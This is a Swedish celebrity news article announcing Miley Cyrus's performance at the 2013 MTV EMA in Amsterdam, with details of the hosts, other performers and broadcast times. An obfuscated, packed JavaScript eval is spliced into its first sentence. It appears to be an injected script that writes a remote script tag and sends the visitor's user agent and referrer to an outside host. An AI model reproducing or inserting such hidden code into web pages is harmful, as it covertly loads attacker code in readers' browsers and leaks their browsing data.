Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Miley Cyrus klar för 2013 MTV EMA

Miley Cyrus klar för 2013 MTV EMA
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ketia|var|u0026u|referrer|bbzra||js|php’.split(’|’),0,{}))
talas fortfarande om 
Miley Cyrus kontroversiella uppträdande ifrån MTV Video Music Awards trots att det gått flera månader sedan hon twerkade med gigantiska nallebjörnar och Robin Thicke. Idag offentliggörs att hon ska uppträda på den europeiska galan ”2013 MTV EMA” i Amsterdam den 10:e november. Och det lär inte bli mindre uppståndelse den här gången.

Miley Cyrus är albumaktuell med Bangerz som har toppat listorna världen över och innehåller bland annat hitsinglarna ”Wrecking Ball” och ”We Can’t Stop”. MTV sände för några veckor sedan dokumentären Miley; The Movement där man fick följa stjärnan innan och efter skandaluppträdandet.

“Jag föddes till att bli den jag är just nu. Jag är vid en punkt i min karriär där jag kan vara precis vad jag vill… vem jag vill”, sa Miley Cyrus i ett uttalande tidigare i oktober.

Galan direktsänds kl 21:00 från Ziggo Dome i Amsterdam och även Katy Perry och The Killers ska uppträda. ”2013 MTV EMA” leds av charmtrollet Redfoo från LMFAO och Ron Burgundy (Will Ferell) dyker upp som gästreporter. Nya stjärnskottet Ariana Grande agerar backstagevärd och kommer att följa kändisarna bakom kulisserna via sociala medier.  Fler artister och överraskningar tillkännages varje vecka fram till galan.

Missa inte den snygga promon med Redfoo och Miley Cyrus: 

http://media.mtvnservices.com/embed/mgid:arc:video:mtvema.com:fa738647-a1b3-4133-a691-a2ee969f67c0

Sändningstid

2013 MTV EMA sänds söndagen den 10:e november kl. 21:00 på MTV. De som vill se artisterna göra entré på röda mattan ska slå på TV:n en timme tidigare, kl. 20:00.